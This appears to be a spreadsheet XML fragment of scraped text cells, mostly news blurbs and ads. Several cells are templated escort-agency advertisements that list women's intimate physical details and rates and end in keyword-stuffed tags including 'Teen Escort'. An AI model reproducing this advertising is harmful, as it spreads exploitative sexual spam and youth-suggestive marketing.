people embracing the outdoors. “You definitely don’t need to be a certain race or look a certain way to go out and experience the things you want to experience,” says Smith. Still, although there are other stories to be found underneath the dominant white, middle class American narrative, there’s still a limit to which just being open to the outdoors will allow you to be part of this world. You need money, for one. And do you need a partner? A lot of Van Life photographs invite you into the scene. Courtesy Emily King and Corey Smith/ @wheresmyofficenow Lisa Jacobs doesn’t think so, but she admits that, at first, she was really conscious of how her life diverged from the prescribed Van Life look. “I did feel kind of isolated, because everyone that I had followed and everyone that I had talked to on Instagram — they were all these gorgeous couples sharing these wonderful adventures together,” she says. “And so then, when I didn’t look like that anymore, I didn’t really know who I connected with.” Post-break up, Jacobs took some time away from the van. She started listening to the Women on the Road podcast and felt the urge to get back on the road. Now, she loves the experience of traveling solo. It’s liberating, windows down, cruising through the desert or along an ocean path, living in the present. She recalls the first day she got back in the van after her relationship ended. “I just pulled over and stopped and made some food, took in the textures of the sky. I was like: ‘This is my moment, this is what I’m doing. I’m here, right now.'” “When you put two people in 50 square feet, and you tell them that all the interpersonal stuff has to be perfect…it’s pretty challenging” Corey Smith of @wheresmyofficenow Alongside her Instagram, Lisa also blogs about her experience, on topics as diverse as the difficulties of dating on the road or giving practical advice on how to deck out your vehicle. She tries to share the difficult times, as well as the good stuff. But, like a lot of Instagram influencers, she tends to put the meaty stuff in her captions, so a quick scroll through the grid doesn’t give a lot away. It was via a long Instagram caption that Emily King and Corey Smith announced the news that shocked the Van Life community: After several years traveling around the world together, they’ve decided to take some time apart. “When you put two people in 50 square feet, and you tell them that all the interpersonal stuff has to be perfect … it’s pretty challenging,” says Smith. On Instagram Stories — the more personal, live update part of the platform — the couple had been honest about some of their relationship struggles. But scrolling through the feed, you’d probably be none the wiser. In the pictures, they always look like a perfect couple, living a perfect life. King and Smith are currently taking some time apart. Courtesy Emily King and Corey Smith/ @wheresmyofficenow “I think to some degree, a lot of people had built us up as this super couple, or whatever, in their mind. I think that’s what happens a lot on social media, people put you in a box. And they want to you to stay that certain way,” says Smith. They’re going their separate ways, but keeping up the Instagram account. They think it will help add a bit of realism into this uber-aesthetic corner of the internet. “Everyone just looks like their life is the best, and there’s no struggles,” says Smith. “You’ve got to mix the good with the bad, so there’s some sort of reality.” ‘Crescendo of life’ Like Emily King and Corey Smith, Calum Creasey admits Van Life can be tough on a relationship — you share all your good times with your partner in a tiny space, and all the bad times too. “We’ve definitely tested ourselves,” he says. “I guess the hope is we’re more resilient now, having had those experiences.” It’s all worth it though, he says. After all, there’s a reason why Van Life is a viral phenomenon. “Waking up next to the person that you love, in a beautiful place that you feel like is all your own, I guess you could very much be the only human beings on the planet,” says Creasey. “That’s the crescendo of life for me. It just genuinely does not get any better than that.” What it's really like to travel the world in a camper van The post What it's really like to travel the world in a camper van appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Tari Jeffers</t>
  </si>
  <si>
    <t>Shire rates increase for 2019-20 one of the lowest in the South West.</t>
  </si>
  <si>
    <t>Sky Serien &amp; Shows HD: (Astra 1N 19.2E, 2019-07-27 15:02)… KingOfSat News The post Sky Serien &amp; Shows HD: (Astra 1N) appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>There are loads of superb iOS apps that cost nothing – so save your money and get downloading. Here’s Macworld’s guide to the 80 best free iPhone apps… Latest iPhone Articles from Macworld UK The post Best free iPhone apps appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Adrian Warren</t>
  </si>
  <si>
    <t>Parramatta NRL coach Brad Arthur says his club would be interested in getting back former star Semi Radradra if reports he will return to Australia are true.</t>
  </si>
  <si>
    <t>LVI preferred dentist (www.lvismile.com) Certified in soft tissue lasers Member of the American Academy of Cosmetic Dentistry (www.aacd.com). Dentist Vaughan, ON | Vaughan Woodbridge Dental Center If you are looking for a dentist in Vaughan, Ontario you don’t have to look any further than Vaughan Woodbridge Dental, Center.Our Dentists in Vaughan are highly trained and experienced and are dedicated. Norton Dental Vaughan is a Preferred Invisalign Vaughan Provider. Dentures Vaughan Here at Norton Dental Vaughan in Vaughan, your Vaughan dentist, understands how hard it is for patients who simply are not comfortable with their smiles. Norton Dental. Ontario Vaughan Dentist Dr. Joseph Mendolia Send a Message Back to Account Send a Message. Preferred Reply Time Location Message * Answer Security Question Join Our Newsletter About Finding Dental Professionals is easy by searching our. Connect with Dr. Joseph Mendolia, Dentist in Vaughan, Ontario Canada. Find Dr. Joseph Mendolia reviews and more. Contact Us Member Login Get Listed Today Home How It Works Buy &amp; Sell Courses / Events Classifieds. LVI preferred dentist (www.lvismile.com) Certified in soft tissue lasers Member of the American Academy of Cosmetic Dentistry (www.aacd.com) Member of the Ontario Dental Association (www.oda.ca) Your Woodbridge Vaughan Dentist Services Teeth Whitening. Cosmetic Dentist In Vaughan Ontario Dental crisis deepens in Gwynedd, as parents struggle to find NHS places for children – In light of the alarming findings, Ms Gwenllian has called for the health minister, Vaughan Gething, to take immediate action. The shortage of dentists and the way the current contract works are. Dr. Rachel, Woodbridge, Vaughan , ON, Dentist: Dentist</t>
  </si>
  <si>
    <t>This content originally appeared on Arden’s Day and the Juicebox Podcast. Republished with permission.Jake Leach is Dexcom’s Chief Technology Officer and on this podcast, he is hoping to receive your feedback, talk about Dexcom G6 enhancements and spill the beans about how Apple Watch will soon be helping you with your type 1 diabetes. Check […] The post Dexcom Suggestion Box appeared first on Equalibras.</t>
  </si>
  <si>
    <t>The transactions, which involved Jeffrey Epstein moving money out of the United States, were flagged after Deutsche Bank reportedly began looking for indications that he was using his money for sex trafficking.</t>
  </si>
  <si>
    <t>There are eight races scheduled for Coffs Harbour today.</t>
  </si>
  <si>
    <t>The pastor convinced her followers to move to Fiji in 2014 where some say they were beaten. The post Shin Ok-ju: S Korean doomsday cult leader jailed for six years appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Nicholas McElroy</t>
  </si>
  <si>
    <t>Foreign correspondents have condemned the arrest of a French news crew while covering an anti-Adani protest in north Queensland this week.</t>
  </si>
  <si>
    <t>Students "pay through the nose" for inadequate document checking service, says Universities UK. The post Fix “woeful” overseas student visa service, say universities appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>40+ komfortable kleine Terrasse auf Hinterhof-Ideen #Hinterhof #backyarddesign #backyarddesignideas The post 40+ komfortable kleine Terrasse auf Hinterhof-Ideen – roomysource appeared first on Dekoration.</t>
  </si>
  <si>
    <t>Welcome to escorts in Debden Green CB11, covering the whole area of Essex. We have escorts serving the flats, homes and local hotels in Debden Green and the surrounding Essex areas. Debden Green Escort Essex Escort Services Debden Green Escorts - Girls Who Know How to Fulfill You in Essex There are quite a lot of men who like to enjoy the companionship of women as much as they can. They want to be with as many different types of women as possible since they love to experiment. However, when the time comes to face reality, they realize that it is not easy to meet women of different types and to date, them is all together with a different issue. However, when you are in Debden Green, things can be different for you. If you have been to the area, you would have seen the number of beautiful women that are walking around. Some of these are Debden Green escorts who would be ready to date you when you are in the area. Escort agencies in the Essex area are all very professional, and the quality of services provided by them is quite high. There is quite a lot of competition in the industry today, because of which you will get the benefit of choosing from some of the best agencies and some of the best escorts around. These agencies are all legal, and there is a massive demand for these ladies among the men who travel to the area. Men are looking for companionship from Debden Green escorts who are professional, pleasant and good looking and you would find many girls in the area who provide you just that. You don’t even have to spend a large amount of money to get their services since the agencies offer the companionship of these women at very reasonable rates today. You should select a girl that matches your taste, after selecting you to spend the entire day getting closer to one of the Essex escorts. Don’t be nervous because you are booking the escort services for the first time, the telephone operator at Debden Green escort will make you comfortable. If you are worried even after then let the escort you select put you at ease, she will make you feel comfortable. For choosing a companion of your choice, you should first visit the online escort gallery, spend some time browsing various profiles and then make your decision of the Debden Green high-end girls. Escort Name: Chanel Location: Debden Green (CB11 3) Nationality: Australian Spoken Language: English, German Age: 20 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 45 Hair Leigh: Long Hair Color: Driftwood Lights Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Debden Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Chanel Escort Name: Adrena Location: Debden Green (CB11 3) Nationality: Danish Spoken Language: English, Spanish Age: 24 years old Weight: 67.3kg (148lb) (10st - 8lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 36 Hair Leigh: Medium-length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Debden Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Adrena Escort Name: Anais Location: Debden Green (CB11 3) Nationality: Scottish Spoken Language: English, Latvian Age: 23 years old Weight: 60.0kg (132lb) (9st - 6lb) Height: 5 feet 5 inches (165.10cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: No Availability Area: Debden Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Anais Escort Name: Cher Location: Debden Green (CB11 3) Nationality: British Spoken Language: English, Greek Age: 20 years old Weight: 51.4kg (113lb) (8st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 37 Hair Leigh: Medium-Length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Yes Drinking: No Availability Area: Debden Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Cher Escort Name: Gaynor Location: Debden Green (CB11 3) Nationality: Swiss Spoken Language: English, Polish Age: 28 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 9 inches (175.26cm) Dress Size: L Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Debden Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gaynor Debden Green French Escort, Debden Green Scottish Escort, Debden Green Best Escort, Debden Green Blonde Escort, Debden Green Brazilian Escort, Debden Green British Escort, Debden Green Erotic Escort, Debden Green Agency Escort, Debden Green Massage Escort, Debden Green Black Escort, Debden Green Gay Escort, Debden Green Independent Escort, Debden Green Ebony Escort, Debden Green Brunette Escort, Debden Green Indian Escort, Debden Green Chinese Escort, Debden Green Young Escort, Debden Green Incall Escort, Debden Green Busty Escort, Debden Green Polish Escort, Debden Green Indian Escort, Debden Green Female Escort, Debden Green Teen Escort, Debden Green Mature Escort, Debden Green Porn Escort, Debden Green Spanish Escort, Debden Green Asian Escort, Debden Green Outcall Escort , Debden Green Male Escort, Debden Green Bisexual Escort, Debden Green Cheap Escort, Debden Green Walsh Escort, Debden Green Horny Escort, Debden Green Irish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Debden Green appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>According to the Sun’s Mike McGrath, Crystal Palace are preparing a £5m move for Newcastle United centre-back Ciaran Clark. A potential season-long loan is also mooted, however the story states that they believe a bid of around £5m would be enough to bring the Irish international to Selhurst Park. Clark, 29, has featured heavily over our first three games of pre-season so far, however it would not surprise me to see him move on this summer, with him likely to be our fifth choice centre-back when Lascelles, Lejeune, Schar and Fernandez are all fit – not to mention the fact Paul Dummett would probably get the nod over Clark in a three-man defence. The Sun state that Hodgson wants to bring in competition for Mamadou Sakho and James Tomkins and has identified Clark as a target due to his Premier League experience. I’m sure the powers that be would be delighted to receive £5m for Clark – who is now approaching his 30’s – however he may be seen as a valuable squad player by Bruce if we are to continue playing with three centre-backs. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>He’s coming for you, Jim Acosta! WALLACE: “I think that if Donald Trump is re-elected, and in the second term maybe a reporter ends up in jail, maybe one of those investigators being investigated for the third time now ends up in jail, I think that every Democrat that blinked when this document came out […]</t>
  </si>
  <si>
    <t>Agriculture giant Cargill is not the first major company to fall short of an environmental commitment, and it is unlikely to be the last.</t>
  </si>
  <si>
    <t>An energetic, honest, and responsible fellow is needed in an ever expanding family-based garage door installation business. This is a physical job with working in cold weather. The ideal candidate is over 5’9” and physically strong person with a clear driving record. Experience is not required, but is an asset, as onsite training will be .. Read more</t>
  </si>
  <si>
    <t>Welcome to escorts in Lawford CO11, covering the whole area of Essex. We have escorts serving the flats, homes and local hotels in Lawford and the surrounding Essex areas. Lawford Escort Essex Escort Services Lawford Escorts - Girls Who Know How to Fulfill You in Essex Dating is meant to be fun and enjoyable for men and Lawford women but the way things are today, it only becomes frustrating and very depressing. Men who want to date women have to chase them around, try to woo them, buy them gifts and take them to expensive restaurants. Even after doing all of these things, there is no guarantee for men that the woman would be ready to date them. Also, you should only consider putting in all these efforts when you are sure that you are prepared for a commitment. However, it is not necessary anymore for you to be ready to give a commitment when you want to enjoy the companionship of a Lawford escort woman and have. When you just want to have fun, you can get in touch with Lawford escorts. These women will be your companions without wanting anything in return. Lawford escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. These escorts are known by Lawford men all around because they are adventurous and very bold. They are elite women who are an absolute pleasure as companions, and once you meet them, you would not be able to get them out of your mind. These are the [field city_name escort females who want to have fun and enjoy themselves. They are elegant, exciting and they can teach you a lot of skills that would be useful to you later with women! Just talking to them for hours would be an experience that you would remember for long later on since these women are extraordinary and they are worth all your time. These ladies can turn you on in a big way even when you are outside with them! Escort Name: Chanel Location: Lawford (CO11 2) Nationality: Australian Spoken Language: English, German Age: 20 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 45 Hair Leigh: Long Hair Color: Driftwood Lights Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Chanel Escort Name: Ursula Location: Lawford (CO11 2) Nationality: Welsh Spoken Language: English, Dutch Age: 23 years old Weight: 45.9kg (101lb) (7st - 3lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Contrast Melt Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ursula Escort Name: Adrena Location: Lawford (CO11 2) Nationality: Danish Spoken Language: English, Spanish Age: 24 years old Weight: 67.3kg (148lb) (10st - 8lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 36 Hair Leigh: Medium-length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Adrena Escort Name: Anais Location: Lawford (CO11 2) Nationality: Scottish Spoken Language: English, Latvian Age: 23 years old Weight: 60.0kg (132lb) (9st - 6lb) Height: 5 feet 5 inches (165.10cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: No Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Anais Escort Name: Cher Location: Lawford (CO11 2) Nationality: British Spoken Language: English, Greek Age: 20 years old Weight: 51.4kg (113lb) (8st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 37 Hair Leigh: Medium-Length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Yes Drinking: No Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Cher Escort Name: Gaynor Location: Lawford (CO11 2) Nationality: Swiss Spoken Language: English, Polish Age: 28 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 9 inches (175.26cm) Dress Size: L Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Lawford Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gaynor Lawford Indian Escort, Lawford Mature Escort, Lawford Busty Escort, Lawford Ebony Escort, Lawford Brunette Escort, Lawford Walsh Escort, Lawford British Escort, Lawford Black Escort, Lawford Brazilian Escort, Lawford Irish Escort, Lawford Porn Escort, Lawford Young Escort, Lawford Chinese Escort, Lawford Spanish Escort, Lawford Outcall Escort, Lawford Massage Escort, Lawford Agency Escort, Lawford Gay Escort, Lawford Asian Escort, Lawford Cheap Escort, Lawford Bisexual Escort, Lawford Horny Escort, Lawford Blonde Escort, Lawford Independent Escort, Lawford Best Escort, Lawford Male Escort, Lawford Female Escort, Lawford French Escort, Lawford Erotic Escort, Lawford Polish Escort, Lawford Teen Escort, Lawford Scottish Escort, Lawford Incall Escort, Lawford Indian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Lawford appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Easton Wood is yet to be involved in a discussion about a succession plan for the Western Bulldogs captaincy.</t>
  </si>
  <si>
    <t>Welcome to escorts in Sutton CB6, covering the whole area of Cambridgeshire. We have escorts serving the flats, homes and local hotels in Sutton and the surrounding Cambridgeshire areas. Sutton Escort Cambridgeshire Escort Services Sutton Escorts - Girls Who Know How to Fulfill You in Cambridgeshire There are quite a lot of men who like to enjoy the companionship of women as much as they can. They want to be with as many different types of women as possible since they love to experiment. However, when the time comes to face reality, they realize that it is not easy to meet women of different types and to date, them is all together with a different issue. However, when you are in Sutton, things can be different for you. If you have been to the area, you would have seen the number of beautiful women that are walking around. Some of these are Sutton escorts who would be ready to date you when you are in the area. To achieve your dreams, you should continuously look for various options to realize them. One of the options where you can shine is when there is an important even like annual office day, or your company has organized a special event where a lot of visitors are visiting your office from different branches. To impress your superiors and bosses, you might want to suggest them a great idea of hiring Sutton escorts for the guests visiting in the company event. Your guests will surely be impressed and would feel esteemed when they would meet these stunning escort girls. Hiring the services of these Sutton escort girls will surely turn out to be great since these stunning beauties will cater to the needs of the visitors and make your guests feel outstanding and comfortable at the same time. After the party, you can request for exceptional massage service for these visitors or guests. You should select a girl that matches your taste, after selecting you to spend the entire day getting closer to one of the Cambridgeshire escorts. Don’t be nervous because you are booking the escort services for the first time, the telephone operator at Sutton escort will make you comfortable. If you are worried even after then let the escort you select put you at ease, she will make you feel comfortable. For choosing a companion of your choice, you should first visit the online escort gallery, spend some time browsing various profiles and then make your decision of the Sutton high-end girls. Escort Name: Maria Location: Sutton (CB6 2) Nationality: British Spoken Language: English, Romanian Age: 29 years old Weight: 57.7kg (127lb) (9st - 1lb) Height: 5 feet 11 inches (180.34cm) Dress Size: M Shoe Size: 36 Hair Leigh: Long Hair Color: Red Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Maria Escort Name: Zenaida Location: Sutton (CB6 2) Nationality: English Spoken Language: English, Croatian Age: 24 years old Weight: 64.1kg (141lb) (10st - 1lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 39 Hair Leigh: Short Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Yes Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Zenaida Escort Name: Daniella Location: Sutton (CB6 2) Nationality: Belgian Spoken Language: English, Spanish Age: 26 years old Weight: 48.2kg (106lb) (7st - 8lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 36 Hair Leigh: Very long Hair Color: Red Eye Color: Violet Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Daniella Escort Name: Brandy Location: Sutton (CB6 2) Nationality: American Spoken Language: English, Icelandic Age: 41 years old Weight: 68.6kg (151lb) (10st - 11lb) Height: 5 feet 7 inches (170.18cm) Dress Size: XXL Shoe Size: 41 Hair Leigh: Short Hair Color: Brown Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: Yes Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Brandy Escort Name: Jade Location: Sutton (CB6 2) Nationality: Israeli Spoken Language: English, Korean Age: 18 years old Weight: 68.2kg (150lb) (10st - 10lb) Height: 5 feet 9 inches (175.26cm) Dress Size: M Shoe Size: 39 Hair Leigh: Very Long Hair Color: Chocolate Mauve Eye Color: Amber Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: No Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Jade Escort Name: Ursula Location: Sutton (CB6 2) Nationality: Welsh Spoken Language: English, Dutch Age: 23 years old Weight: 45.9kg (101lb) (7st - 3lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Contrast Melt Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Sutton Outcall: Cambridgeshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ursula Sutton Indian Escort, Sutton Horny Escort, Sutton Independent Escort, Sutton Young Escort, Sutton Walsh Escort, Sutton Best Escort, Sutton Irish Escort, Sutton Spanish Escort, Sutton Male Escort, Sutton Massage Escort, Sutton Outcall Escort , Sutton Porn Escort, Sutton Ebony Escort, Sutton Teen Escort, Sutton Asian Escort, Sutton Polish Escort, Sutton Blonde Escort, Sutton Indian Escort, Sutton Busty Escort, Sutton Agency Escort, Sutton Chinese Escort, Sutton Female Escort, Sutton Cheap Escort, Sutton Mature Escort, Sutton Erotic Escort, Sutton British Escort, Sutton Brazilian Escort, Sutton Gay Escort, Sutton Brunette Escort, Sutton Scottish Escort, Sutton Bisexual Escort, Sutton Incall Escort, Sutton French Escort, Sutton Black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Sutton appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Are you earning what you are worth? Do you get to save for your retirement? Do you get to travel the way you want to? Do you want to work around your kids’ lives? Learn how to set up your own digital business where you can work anytime, anywhere, as long as you have wifi. .. Read more</t>
  </si>
  <si>
    <t>Sam Morgan</t>
  </si>
  <si>
    <t>To make it in the music business, sometimes you need to put less emphasis on the music and more emphasis on the business… Touring isn’t cheap. Recording isn’t cheap. Plane tickets, guitar strings, office space, none of this grows on trees. So until your project starts making money, you’re going to need to find some capital. Working in a pub might pay the bills day to day, but if you need to block out some serious studio time or pay for flights and visas, pulling pints probably isn’t going to cut it. It’s hard to quantify how much the art you’re creating is worth, but luckily it’s easier to work out how much it will cost to make. Here’s a few ways of finding the funds you need to get going. Private and Government Loans In 2012 the UK government created the Start Ups Scheme which has since helped to fund hundreds of businesses. These are unsecured personal loans ranging from £500 to £25,000. They offer help to guide you through the application process and, on receiving the loan, you’re eligible for 12 months of free business mentoring. Virgin Start Ups also offers loans of up to £25,000 per person, repayable over one to five years with a fixed interest rate of 6%. One of the great things about these loans is that if you’re working with a partner, you can both apply, potentially doubling the amount you receive. To be eligible, you must be over 18 and your business has to have been running for less than twelve months. For more information, click here. Grants The UK has a lot of grant options available for UK artists, ranging from hundreds to thousands of pounds. Bear in mind that while you won’t have to pay the money back, you will need to account for every penny spent. The Performing Rights Society (PRS) alone offers a variety of grants for artists at all stages of their careers, here are just a few: Lynsey De Paul Prize: Up to £2,500 to female musicians. The Open Fund For Music Creators: Up to £5,000 for a wide range of activities, including touring, writing and recording. Momentum Music Fund: £5,000 – £15,000 for touring, marketing or recording. These grants can often be stepping stones to great things, recent recipients include chart topper Sam Fender and the MOBO winning Zara MacFarlane. To learn more or apply, head over to the PRS website. The UK Arts Council also offers grants of up to £15,000. However, as the money you’re spending will come from public funds, applicants must follow particularly stringent criteria. For example, you must have plans for distributing any recordings funded by the grant. The first step to applying is a simple quiz, click here to take it. Applying for grants can be tough and competitive, so make sure you put together an excellent proposal and have the passion to impress whoever you’re pitching to. Crowdfunding From noughties breakouts like Lily Allen and the Arctic Monkeys through to today’s Soundcloud rappers, the internet has become essential in forging artists’ careers. Social media connects musicians and businesses to their fan-bases, allowing them to share new music and updates, so why not use it to do some fundraising? Crowdfunding uses the internet to reach out to the public and ask them to contribute a small amount of their own money to help make your dreams come true. In return, you offer anything that you think fans might want from you – maybe some merchandise or a personalised video. Make sure that you’re persuasive and honest, only asking when you really need the money; fans are willing to pay to support up-and-coming artists, but they have their limits. Offer great rewards that won’t break the bank and put out regular updates on how it’s going. If done properly, crowdfunding can help make you money and bring in new fans. While PledgeMusic, a crowdfunding organisation that was set up specifically for music projects, has recently gone into administration, there are plenty of other options to choose from. If you want to try crowdfunding out, check Kickstarter, ArtistShare, IndieGoGo or Patreon. How Can ACM Help? So now you’ve read up on the basics of fundraising, but the music business is vast and varied and it’s important to give yourself the best footing you can. Everyone starts at the bottom and works their way up, there’s nothing wrong with that. So if you love music but you’re not sure how to get going in the industry, the Music Business &amp; Innovation Route at ACM’s Guildford and Birmingham campuses is what you’re looking for. The accelerated two year course gives its students the grounding they need in areas like A&amp;R, Law and Marketing to prepare them for life in the music industry. Alternatively, if you’re London based, then the Music Business &amp; Innovation (Ba) may be better suited to you. The course runs for three years and students can expect to graduate with an in depth understanding of a broad range of the issues facing the modern music industry. This means that when you need to tackle anything from running events to breaking your first act to making sure your record deal is the best you can get, you’ll know what to do. ACM strives to make itself as accessible to as many people as possible, so alongside student loans, the Academy also offers £130,000 worth of scholarships each year. It’s really simple to apply, but they all have deadlines, so don’t delay! Getting started in the music industry is always tough, but not having the funds to get going shouldn’t be your main problem. Whether it’s through grants, loans or crowdfunding, if you’re determined enough, there’s money out there for you. The post How To: Applying for Music Business Funding appeared first on ACM.</t>
  </si>
  <si>
    <t>2:07 PM ET Portland Trail Blazers guard CJ McCollum has agreed to a three-year, $100 million contract extension, extending his current deal to five years and $157 million, his agent, Sam Goldfeder of Excel Sports, told ESPN. The new deal will start with the 2021-22 season. McCollum became eligible for the extension on Saturday and joins All-NBA teammate Damian Lillard in landing summer deals that solidify the Blazers’ backcourt into the mid-2020s. Goldfeder and Blazers president of basketball operations Neil Olshey completed the agreement on Tuesday. McCollum, 27, has been one of the anchors of the Blazers’ success in recent seasons, including two trips to the Western Conference semifinals and last season’s berth in the conference finals. McCollum was eligible to negotiate the extension beginning on July 27 — the third anniversary of his signing a four-year, $106 million extension. He averaged 21 points in each of the last</t>
  </si>
  <si>
    <t>Kelley L Cox-USA TODAY Sports The Pittsburgh Steelers CB Mike Hilton is under contract for 2019 as he has signed his ERFA one-year tender. The Pittsburgh Steelers and cornerback Mike Hilton were on thin ice this offseason. Hilton, who is an Exclusive Rights Free Agent (ERFA), wanted a new contract, and had to make a decision on whether he would report to training camp with a new deal, sign his offered tender, or hold out. Hilton held to his promise of not holding out, reported to training camp and signed his one-year ERFA tender. This from the Steelers’ official website: CB Mike Hilton has signed his one-year exclusive rights tender. MORE: https://t.co/p6UynqOWWT pic.twitter.com/k4MiwglC65 — Pittsburgh Steelers (@steelers) July 25, 2019 The move means Hilton will make $645,000 in 2019, and following this year he will become a Restricted Free Agent (RFA). As an RFA, Hilton will still have his rights held by the Steelers, but the team would be able to put a round tender on him to determine his pay, or what another team would have to sacrifice to sign him. After giving Mike Tomlin a new one-year extension earlier Thursday, the Steelers are slowly crossing items off their to-do list. Hilton now being under contract doesn’t just mean he is able to practice with the team, it means the Steelers can focus their attention on other contracts before the start of the regular season. Stay tuned to BTSC for the latest news and notes as the black-and-gold get started with Training Camp 2019!</t>
  </si>
  <si>
    <t>WA councils began issuing its annual rates notices in recent weeks, with the City of Swan delivering a happy surprise to dozens of its locals.</t>
  </si>
  <si>
    <t>Colin Kruger</t>
  </si>
  <si>
    <t>The quest for customers has been at the heart of the chaotic ride at last mile logistics provider Getswift. And it's not getting any easier.</t>
  </si>
  <si>
    <t>Iran says it has arrested 17 Iranians allegedly recruited by the Central Intelligence Agency to spy on the country's nuclear and military sites, and some have been sentenced to death.</t>
  </si>
  <si>
    <t>Jacqueline Breen</t>
  </si>
  <si>
    <t>A fatal crash following a police pursuit near a community north-east of Alice Springs is being treated as a death in custody, with police declining to say what prompted them to chase the 42-year-old man.</t>
  </si>
  <si>
